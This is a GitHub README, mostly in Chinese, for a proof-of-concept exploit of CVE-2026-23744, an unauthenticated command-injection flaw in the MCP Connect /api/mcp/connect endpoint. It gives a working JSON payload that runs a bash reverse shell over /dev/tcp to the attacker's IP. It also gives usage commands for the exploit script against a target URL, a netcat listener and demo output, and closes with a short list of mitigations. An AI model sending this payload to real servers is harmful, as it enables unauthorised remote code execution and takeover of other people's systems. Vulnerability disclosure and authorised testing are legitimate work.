CyLock11/CVE-2026-23744
GitHub: CyLock11/CVE-2026-23744
针对 MCP Connect 服务 `/api/mcp/connect` 端点未授权命令注入漏洞的 PoC 利用脚本,可远程获取服务器反弹 shell。
Stars: 0 | Forks: 0
# CVE-2026-23744 — MCP Connect 通过未授权命令注入实现 RCE




## 📌 漏洞描述
该漏洞存在于 `/api/mcp/connect` 端点中,允许**未经身份验证的**攻击者使用恶意配置注册任意 MCP (Model Context Protocol) 服务器。由于没有对 `command` 字段及其 `args` 进行验证或过滤,攻击者可以注入操作系统命令,这些命令将直接以 Web 进程的权限在服务器上执行。
这会导致**远程代码执行 (RCE)**,可被利用在受感染系统上获取一个 **reverse shell**。
## 🧠 技术细节
| 字段 | 详细信息 |
|------------------|-------------------------------------------------|
| **类型** | Remote Code Execution (RCE) |
| **攻击向量** | 网络 (未经身份验证的 HTTP POST 请求) |
| **端点** | `/api/mcp/connect` |
| **严重程度** | 🔴 危急 |
| **身份验证**| 不需要 |
| **影响** | 完全控制服务器 |
### 恶意 Payload
```
{
"serverId": "shell1",
"serverConfig": {
"command": "bash",
"args": ["-c", "bash -i >& /dev/tcp//443 0>&1"],
"env": {}
}
}
```
服务器会处理此配置,并使用提供的参数调用 `bash` 命令,从而与攻击者建立反向 TCP 连接。
## 🛠️ 环境要求
- Python 3.x
- 以下依赖库:
```
pip install requests termcolor
```
## 🚀 使用方法
```
python3 exploit.py -l -u
```
### 参数
| 参数 | 描述 | 示例 |
|-----------|------------------------------------------|----------------------------|
| `-l` | 你的 IP (用于接收 shell) | `192.168.1.50` |
| `-u` | 目标的基础 URL | `https://victim.com` |
### 完整示例
**终端 1 — 监听器:**
```
nc -nlvp 443
```
**终端 2 — Exploit:**
```
python3 exploit.py -l 192.168.1.50 -u https://victim.com
```
## 🎬 演示
```
[-] Please, execute the following command in another terminal:
[+] nc -nlvp 443
[-] Press 'Enter' when the command has been executed...
[+] Sending attack request...
```
一旦发送请求,端口 `443` 上的监听器将接收到反向连接,并提供受感染服务器的交互式 shell。
## 🛡️ 缓解措施
- 在处理 `/api/mcp/connect` 请求体中的所有字段之前,进行**验证和过滤**。
- 对该端点进行**身份验证**,并仅限具有权限的用户访问。
- **切勿直接**根据用户输入**执行**系统命令。
- 实施允许命令的**白名单**。
- 对 Web 服务器进程应用**最小权限**原则。
## 📁 仓库结构
```
.
├── exploit.py # Script principal del exploit
└── README.md # Este archivo
```
## 👤 作者
标签:API安全, CISA项目, CVE-2026-23744, HTTP POST, JSON输出, Maven, MCP Connect, Model Context Protocol, OPA, PoC, Python, RCE, Reverse Shell, TCP反弹Shell, Web安全, 严重漏洞, 命令注入, 数据展示, 无后门, 暴力破解, 未授权攻击, 漏洞验证, 系统提权, 红队, 编程工具, 网络安全, 蓝队分析, 远程代码执行, 隐私保护, 靶场